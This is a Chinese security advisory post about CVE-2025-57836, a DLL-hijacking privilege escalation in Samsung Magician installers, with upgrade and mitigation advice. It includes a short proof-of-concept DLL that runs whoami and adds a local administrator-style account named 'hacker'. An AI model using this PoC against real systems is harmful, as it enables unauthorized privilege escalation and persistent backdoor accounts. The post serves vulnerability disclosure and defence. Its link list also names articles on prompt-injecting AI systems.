文章总结： 三星固态硬盘管理软件SamsungMagician存在高危漏洞CVE-2025-57836，影响6.3.0至8.3.2版本。该漏洞因安装程序在临时目录创建权限过宽文件夹，允许普通用户通过DLL劫持实现本地权限提升至管理员或SYSTEM级别。官方已发布9.0.0版本修复此问题，建议用户立即升级，或限制非管理员权限作为临时缓解措施。 综合评分： 92 文章分类： 漏洞预警,漏洞分析,漏洞POC,终端安全,安全意识

【三星】固态硬盘管理软件高危漏洞CVE-2025-57836

原创

冥夏A爱

表哥带我

2026年1月10日 19:48 广东

❝

由于传播、利用本公众号”表哥带我”所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号”表哥带我”及作者不为此承担任何责任,一旦造成后果请自行承担!

CVE-2025-57836是三星固态硬盘管理软件“三星魔术师”（Samsung Magician）Windows 版中被确认的一个高危漏洞，影响 6.3.0 至 8.3.2 之间的所有版本

漏洞原理 安装程序会在系统上创建一个权限过宽的临时文件夹，任何本地普通用户均可向其中写入或替换 DLL 文件。下次软件启动时，会优先加载该目录下的恶意 DLL，从而完成 DLL 劫持并实现本地权限提升，最终获得管理员级控制权（Samsung Magician 6.3.0–8.3.2 的 Windows 安装包运行时，会在系统临时目录

常见为 %TEMP%\SamsungMagician 或 %TEMP%\is-<RANDOM>.tmp）中先释放若干安装子文件与 DLL。该临时目录默认赋予「Users」组「写入」权限，任意本地普通用户可在安装启动后、加载前，把同名的恶意 DLL 放入该目录。安装引导程序随后以高完整性（HighIntegrity）、Administrator Token 启动子进程并加载上述 DLL → 攻击者代码获得 SYSTEM/管理员权限

// evil_dll.cpp

#include&nbsp;<windows.h>

#pragma&nbsp;comment(lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE h, DWORD r, LPVOID) {

&nbsp; &nbsp; if (r == DLL_PROCESS_ATTACH) {

&nbsp; &nbsp; &nbsp; &nbsp; WinExec("cmd.exe /c whoami > C:\\tmp\\poc.txt", SW_HIDE);

&nbsp; &nbsp; &nbsp; &nbsp; WinExec("cmd.exe /c net user hacker P@ss123 /add", SW_HIDE);

&nbsp; &nbsp; }

&nbsp; &nbsp; return TRUE;

}

严重程度 CVSS v3评分为 7.8（High），属于“高危”级别；利用难度低，只需拥有本地普通用户权限即可，且已发现野外利用案例

受影响版本 Samsung Magician 6.3.0 – 8.3.2（覆盖 2021 年至 2025 年发布的多个小版本）

官方已在 9.0.0 及后续版本中修复该缺陷，并重构了 UI、新增自定义小组件等功能

三星建议所有受影响用户“立即升级”到9.0.0或更高版本；若暂时无法升级，可卸载旧版软件或限制非管理员对安装目录的写入权限作为临时缓解

其他阅读：

【吃瓜】系统故障致航线出现低价Bug票，海航回应

【吃瓜】某信内核大佬因年会没西装被董事长开除

提示词注入学校AI阅卷系统

豆包提示词注入生成性感照片

记一大型商超小程序漏洞挖掘

【吃瓜】11班最强黑客到此一游

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：表哥带我 冥夏A爱《【三星】固态硬盘管理软件高危漏洞CVE-2025-57836》